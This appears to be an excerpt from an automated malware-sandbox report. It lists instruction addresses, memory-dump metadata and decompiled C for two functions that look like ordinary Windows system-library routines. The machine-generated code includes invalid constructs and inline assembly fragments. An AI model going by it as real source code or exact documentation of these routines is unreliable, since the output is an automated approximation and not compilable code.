                                                        0x048a84df
                                                        0x048a86fa
                                                        0x048a86fd
                                                        0x048a86fe
                                                        0x048a8701
                                                        0x048a8706
                                                        0x048a8709
                                                        0x048a870b
                                                        0x00000000
                                                        0x00000000
                                                        0x048a8711
                                                        0x048a8725
                                                        0x048a8727
                                                        0x048a872a
                                                        0x048a872c
                                                        0x048f9af0
                                                        0x048f9af5
                                                        0x048a8732
                                                        0x048a8732
                                                        0x048a8732
                                                        0x048a8735
                                                        0x048a8737
                                                        0x048a8515
                                                        0x048a8515
                                                        0x048a8518
                                                        0x048a851d
                                                        0x048a8523
                                                        0x048a8527
                                                        0x048a852b
                                                        0x048a8537
                                                        0x048a8539
                                                        0x048a853c
                                                        0x048a853e
                                                        0x048a868c
                                                        0x048a8691
                                                        0x048a8699
                                                        0x048a869b
                                                        0x048a8744
                                                        0x048a8748
                                                        0x048a86a1
                                                        0x048a86a1
                                                        0x048a86a1
                                                        0x048a86a4
                                                        0x048a86a8
                                                        0x048f9bdf
                                                        0x048f9bdf
                                                        0x048a86ae
                                                        0x048a86b0
                                                        0x00000000
                                                        0x048a86b6
                                                        0x00000000
                                                        0x048f9be9
                                                        0x048a86b0
                                                        0x048a8544
                                                        0x048a854a
                                                        0x048a854d
                                                        0x048a8551
                                                        0x048a876e
                                                        0x048a8778
                                                        0x048a877b
                                                        0x048a8780
                                                        0x048a8557
                                                        0x048a8557
                                                        0x048a855d
                                                        0x048a855d
                                                        0x048a856b
                                                        0x048a856e
                                                        0x048a8570
                                                        0x048a8573
                                                        0x048a8576
                                                        0x048a8576
                                                        0x048a8579
                                                        0x048a857b
                                                        0x00000000
                                                        0x00000000
                                                        0x048a8581
                                                        0x048a85a0
                                                        0x048a85a2
                                                        0x048a85a5
                                                        0x048a85a7
                                                        0x048f9b1b
                                                        0x048f9b1b
                                                        0x048a862e
                                                        0x048a862e
                                                        0x048a8631
                                                        0x048a8631
                                                        0x048a8634
                                                        0x048a8636
                                                        0x048a8669
                                                        0x048a8669
                                                        0x048a866b
                                                        0x048f9bbf
                                                        0x048f9bc4
                                                        0x048f9bc8
                                                        0x048f9bce
                                                        0x048f9bce
                                                        0x048a8671
                                                        0x048a8671
                                                        0x048a8674
                                                        0x048a8676
                                                        0x048f9bae
                                                        0x048f9bae
                                                        0x048a8676
                                                        0x048a867c
                                                        0x048a867e
                                                        0x048a8688
                                                        0x048a8688
                                                        0x00000000
                                                        0x048a867e
                                                        0x048a8638
                                                        0x048a8638
                                                        0x048a863b
                                                        0x048a863e
                                                        0x048a863f
                                                        0x048a8642
                                                        0x048a8645
                                                        0x048a8648
                                                        0x048a864d
                                                        0x048f9b69
                                                        0x048f9b6e
                                                        0x048f9b7b
                                                        0x048f9b81
                                                        0x048f9b85
                                                        0x048f9b89
                                                        0x048f9ba7
                                                        0x048f9b8b
                                                        0x048f9b91
                                                        0x048f9b9a
                                                        0x048f9b9f
                                                        0x048f9b9f
                                                        0x048a8788
                                                        0x048a878d
                                                        0x048a8763
                                                        0x048a8763
                                                        0x048a8766
                                                        0x00000000
                                                        0x048a8766
                                                        0x048f9b70
                                                        0x00000000
                                                        0x048f9b70
                                                        0x048a8656
                                                        0x048a865a
                                                        0x048a865c
                                                        0x048a8752
                                                        0x048a8756
                                                        0x00000000
                                                        0x00000000
                                                        0x048a875e
                                                        0x00000000
                                                        0x048a875e
                                                        0x048a8662
                                                        0x048a8662
                                                        0x048a8662
                                                        0x048a8666
                                                        0x00000000
                                                        0x048a8666
                                                        0x048a85b7
                                                        0x048a85b9
                                                        0x048a85bc
                                                        0x048a85bf
                                                        0x048a85cc
                                                        0x048a85d1
                                                        0x048a85d4
                                                        0x048a85db
                                                        0x048a85de
                                                        0x048a85e0
                                                        0x048f9b5f
                                                        0x00000000
                                                        0x048f9b5f
                                                        0x048a85e6
                                                        0x048a85ea
                                                        0x048a86c3
                                                        0x048a86c5
                                                        0x048a86c8
                                                        0x048a86ca
                                                        0x048f9b16
                                                        0x00000000
                                                        0x048f9b16
                                                        0x048a86d6
                                                        0x048a85f6
                                                        0x048a85f6
                                                        0x048a85f9
                                                        0x048a8602
                                                        0x048a8606
                                                        0x048a860a
                                                        0x048a860b
                                                        0x048a860e
                                                        0x048a8611
                                                        0x00000000
                                                        0x048a8611
                                                        0x048a85f3
                                                        0x00000000
                                                        0x048a85f3
                                                        0x048a8619
                                                        0x048a861e
                                                        0x048a861e
                                                        0x048a8621
                                                        0x048a8622
                                                        0x048a8623
                                                        0x048a8625
                                                        0x048a862c
                                                        0x00000000
                                                        0x048a873d
                                                        0x00000000
                                                        0x048a873d
                                                        0x048a8737
                                                        0x048a850f
                                                        0x048a8512
                                                        0x00000000
                                                        0x048a8512
                                                        0x00000000
                                                        0x048a84d6

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6832bf34dd114d5be95ed51417fa86d89da1bcee944eac3249c5b44ab757182
                                                        • Instruction ID: f96fe00c448104fdc5dd039c9501159d3e8b3789964003ab75c8d68e1f821dc9
                                                        • Opcode Fuzzy Hash: a6832bf34dd114d5be95ed51417fa86d89da1bcee944eac3249c5b44ab757182
                                                        • Instruction Fuzzy Hash: A8B12DB0E04249DFEB14EF99C984AADBBB5FF44308F144A29E505EB241E7B0BD55CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C513A, Relevance: .3, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E048C513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x498d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E048DD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E048B2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L048B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E048DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E048AFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x498b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E048DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                        0x048c5142
                                                        0x048c514c
                                                        0x048c5150
                                                        0x048c5157
                                                        0x048c5159
                                                        0x048c515e
                                                        0x048c5165
                                                        0x048c5169
                                                        0x048c516c
                                                        0x048c5172
                                                        0x048c5176
                                                        0x048c517a
                                                        0x048c517a
                                                        0x048c517a
                                                        0x048c517f
                                                        0x04906d8b
                                                        0x04906d8e
                                                        0x04906d91
                                                        0x04906d95
                                                        0x04906d98
                                                        0x04906d9c
                                                        0x04906da0
                                                        0x04906da3
                                                        0x04906da7
                                                        0x04906e26
                                                        0x04906e26
                                                        0x04906e2a
                                                        0x048c51f9
                                                        0x048c51f9
                                                        0x048c51fe
                                                        0x04906e33
                                                        0x04906e33
                                                        0x04906e39
                                                        0x04906e3d
                                                        0x04906e46
                                                        0x04906e50
                                                        0x00000000
                                                        0x00000000
                                                        0x04906e52
                                                        0x04906e53
                                                        0x04906e56
                                                        0x04906e5d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04906e5f
                                                        0x04906e67
                                                        0x04906e77
                                                        0x04906e7f
                                                        0x04906e80
                                                        0x04906e88
                                                        0x04906e90
                                                        0x04906e9f
                                                        0x04906ea5
                                                        0x04906ea9
                                                        0x04906eb1
                                                        0x04906ebf
                                                        0x00000000
                                                        0x00000000
                                                        0x04906ecf
                                                        0x04906ed3
                                                        0x00000000
                                                        0x00000000
                                                        0x04906edb
                                                        0x04906ede
                                                        0x04906ee1
                                                        0x04906ee8
                                                        0x04906eeb
                                                        0x04906eed
                                                        0x04906ef0
                                                        0x04906ef4
                                                        0x04906ef8
                                                        0x04906efc
                                                        0x00000000
                                                        0x00000000
                                                        0x04906f0d
                                                        0x04906f11
                                                        0x04906f32
                                                        0x04906f37
                                                        0x04906f3b
                                                        0x04906f3e
                                                        0x04906f41
                                                        0x04906f46
                                                        0x00000000
                                                        0x00000000
                                                        0x04906f4c
                                                        0x04906f50
                                                        0x04906f50
                                                        0x04906f54
                                                        0x04906f62
                                                        0x04906f65
                                                        0x04906f6d
                                                        0x04906f7b
                                                        0x04906f7b
                                                        0x04906f93
                                                        0x04906f98
                                                        0x04906fa0
                                                        0x04906fa6
                                                        0x04906fb3
                                                        0x04906fb6
                                                        0x04906fbf
                                                        0x04906fc1
                                                        0x04906fd5
                                                        0x04906fda
                                                        0x04906fda
                                                        0x04906fdd
                                                        0x04906fe2
                                                        0x04906fe7
                                                        0x04906feb
                                                        0x04906fef
                                                        0x04906ff3
                                                        0x048c520c
                                                        0x048c520c
                                                        0x048c520f
                                                        0x048c5215
                                                        0x048c5234
                                                        0x048c523a
                                                        0x048c523a
                                                        0x048c5244
                                                        0x048c5245
                                                        0x048c5246
                                                        0x048c5251
                                                        0x048c5251
                                                        0x04906f13
                                                        0x04906f17
                                                        0x04906f17
                                                        0x04906f18
                                                        0x04906f1b
                                                        0x04906f1f
                                                        0x04906f23
                                                        0x00000000
                                                        0x04906f28
                                                        0x048c5204
                                                        0x048c5204
                                                        0x048c5208
                                                        0x00000000
                                                        0x048c5208
                                                        0x048c5185
                                                        0x048c5188
                                                        0x048c518a
                                                        0x048c518e
                                                        0x048c5195
                                                        0x04906db1
                                                        0x04906db5
                                                        0x04906db9
                                                        0x048c519b
                                                        0x048c519b
                                                        0x048c519e
                                                        0x048c51a7
                                                        0x048c51a9
                                                        0x048c51a9
                                                        0x048c51b5
                                                        0x048c51b8
                                                        0x048c51bb
                                                        0x048c51be
                                                        0x048c51c1
                                                        0x048c51c5
                                                        0x048c51c9
                                                        0x048c51cd
                                                        0x048c51cd
                                                        0x048c51d8
                                                        0x048c51dc
                                                        0x048c51e0
                                                        0x04906dcc
                                                        0x04906dd0
                                                        0x04906dd5
                                                        0x04906ddd
                                                        0x04906de1
                                                        0x04906de1
                                                        0x04906de5
                                                        0x04906deb
                                                        0x04906df1
                                                        0x04906df7
                                                        0x04906dfd
                                                        0x04906e01
                                                        0x04906e05
                                                        0x04906e09
                                                        0x04906e0d
                                                        0x04906e11
                                                        0x04906e11
                                                        0x048c51eb
                                                        0x04906e1a
                                                        0x04906e1f
                                                        0x04906e21
                                                        0x04906e23
                                                        0x00000000
                                                        0x048c51f1
                                                        0x048c51f1
                                                        0x00000000
                                                        0x048c51f1

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02d77ab426d9d999a88c8f08fb005694e6381e4b4544f8daa9c0c39af4122afa
                                                        • Instruction ID: 99c480144f80de925b8ce140bfcdbfbbcee02f0181c76540370e3a7f79f47327
                                                        • Opcode Fuzzy Hash: 02d77ab426d9d999a88c8f08fb005694e6381e4b4544f8daa9c0c39af4122afa
                                                        • Instruction Fuzzy Hash: 1FC133756083819FD754CF28C480A5AFBF1BF88308F148A6EF9998B392D771E945CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C03E2, Relevance: .3, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 74%
                                                        			E048C03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x498d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E048C0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E048DB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E048AB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4987c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E048B7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E048B7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04917016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E048D9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E049169A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4987c04 != 0) {
						_t118 = _v12;
						_t120 = E0491A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4987bd8;
						if( *0x4987bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E048D95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E048D99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04913540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0489B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E048DAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4988474 - 3;
										if( *0x4988474 != 3) {
											 *0x49879dc =  *0x49879dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E048B7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E048B7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04917016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4988708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4987b00; // 0x0
							asm("ror esi, cl");
							 *0x498b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E048D95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E048A7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                        0x048c03f1
                                                        0x048c03f7
                                                        0x048c03f9
                                                        0x048c03fb
                                                        0x048c03fd
                                                        0x048c0400
                                                        0x048c040a
                                                        0x04904c7a
                                                        0x048c0537
                                                        0x048c0547
                                                        0x048c0410
                                                        0x048c0410
                                                        0x048c0414
                                                        0x048c0417
                                                        0x048c041a
                                                        0x048c0421
                                                        0x048c0424
                                                        0x048c042b
                                                        0x048c043b
                                                        0x048c043e
                                                        0x048c043f
                                                        0x048c043f
                                                        0x048c0446
                                                        0x048c0449
                                                        0x048c044c
                                                        0x048c044f
                                                        0x048c0459
                                                        0x04904c8d
                                                        0x048c045f
                                                        0x048c045f
                                                        0x048c045f
                                                        0x048c0467
                                                        0x04904c97
                                                        0x04904c9d
                                                        0x04904ca4
                                                        0x04904caa
                                                        0x04904caf
                                                        0x04904cb1
                                                        0x04904cc3
                                                        0x04904cb3
                                                        0x04904cbc
                                                        0x04904cbc
                                                        0x04904cc8
                                                        0x04904ccb
                                                        0x04904cd7
                                                        0x04904cda
                                                        0x04904cdf
                                                        0x04904cdf
                                                        0x04904ccb
                                                        0x04904ca4
                                                        0x048c046d
                                                        0x048c046f
                                                        0x048c046f
                                                        0x048c0471
                                                        0x048c0476
                                                        0x048c047a
                                                        0x048c047b
                                                        0x048c0483
                                                        0x048c0489
                                                        0x048c048d
                                                        0x00000000
                                                        0x00000000
                                                        0x04904ce9
                                                        0x04904cef
                                                        0x04904d22
                                                        0x04904d22
                                                        0x00000000
                                                        0x04904d22
                                                        0x04904cf1
                                                        0x04904cf7
                                                        0x00000000
                                                        0x00000000
                                                        0x04904cf9
                                                        0x04904cff
                                                        0x00000000
                                                        0x00000000
                                                        0x04904d05
                                                        0x04904d07
                                                        0x00000000
                                                        0x00000000
                                                        0x04904d0d
                                                        0x04904d0f
                                                        0x04904d14
                                                        0x04904d16
                                                        0x00000000
                                                        0x00000000
                                                        0x04904d1c
                                                        0x04904d1c
                                                        0x048c0499
                                                        0x048c0535
                                                        0x048c0535
                                                        0x00000000
                                                        0x048c0535
                                                        0x048c04a6
                                                        0x04904d2c
                                                        0x04904d37
                                                        0x04904d39
                                                        0x04904d3b
                                                        0x00000000
                                                        0x00000000
                                                        0x04904d41
                                                        0x04904d48
                                                        0x048c0527
                                                        0x048c052b
                                                        0x048c052d
                                                        0x048c0530
                                                        0x048c0530
                                                        0x00000000
                                                        0x048c052b
                                                        0x04904d4e
                                                        0x048c04ac
                                                        0x048c04ac
                                                        0x048c04af
                                                        0x048c04b2
                                                        0x048c04b7
                                                        0x048c04b9
                                                        0x048c04bb
                                                        0x048c04bd
                                                        0x048c04bf
                                                        0x048c04c5
                                                        0x048c04c9
                                                        0x04904d53
                                                        0x04904d59
                                                        0x04904db9
                                                        0x04904dba
                                                        0x04904dbf
                                                        0x04904dc2
                                                        0x04904dc4
                                                        0x04904dc7
                                                        0x04904dce
                                                        0x00000000
                                                        0x04904dce
                                                        0x04904d5b
                                                        0x04904d61
                                                        0x00000000
                                                        0x00000000
                                                        0x04904d63
                                                        0x04904d69
                                                        0x00000000
                                                        0x00000000
                                                        0x04904d6b
                                                        0x04904d6e
                                                        0x04904d74
                                                        0x04904d76
                                                        0x04904d7c
                                                        0x04904d7e
                                                        0x04904d84
                                                        0x04904d89
                                                        0x04904d8c
                                                        0x04904d8d
                                                        0x04904d92
                                                        0x04904d95
                                                        0x04904d96
                                                        0x04904d98
                                                        0x04904d9a
                                                        0x04904d9f
                                                        0x04904da4
                                                        0x04904da6
                                                        0x04904da8
                                                        0x04904daf
                                                        0x04904db1
                                                        0x04904db1
                                                        0x04904daf
                                                        0x04904da6
                                                        0x04904d84
                                                        0x04904d7c
                                                        0x00000000
                                                        0x04904d74
                                                        0x048c04d6
                                                        0x04904de1
                                                        0x048c04dc
                                                        0x048c04dc
                                                        0x048c04dc
                                                        0x048c04e4
                                                        0x04904deb
                                                        0x04904df1
                                                        0x04904df8
                                                        0x04904dfe
                                                        0x04904e03
                                                        0x04904e05
                                                        0x04904e17
                                                        0x04904e07
                                                        0x04904e10
                                                        0x04904e10
                                                        0x04904e1c
                                                        0x04904e1f
                                                        0x04904e35
                                                        0x04904e35
                                                        0x04904e1f
                                                        0x04904df8
                                                        0x048c04f1
                                                        0x048c04fa
                                                        0x04904e3f
                                                        0x04904e47
                                                        0x04904e5b
                                                        0x04904e61
                                                        0x04904e67
                                                        0x04904e69
                                                        0x04904e71
                                                        0x04904e73
                                                        0x048c0500
                                                        0x048c0500
                                                        0x048c0500
                                                        0x048c04fa
                                                        0x048c0508
                                                        0x048c051d
                                                        0x048c051d
                                                        0x048c051f
                                                        0x048c0524
                                                        0x00000000
                                                        0x048c0524
                                                        0x048c0515
                                                        0x048c0517
                                                        0x04904e7a
                                                        0x04904e7c
                                                        0x00000000
                                                        0x00000000
                                                        0x04904e85
                                                        0x00000000
                                                        0x04904e85
                                                        0x00000000
                                                        0x048c0517

                                                        Memory Dump Source
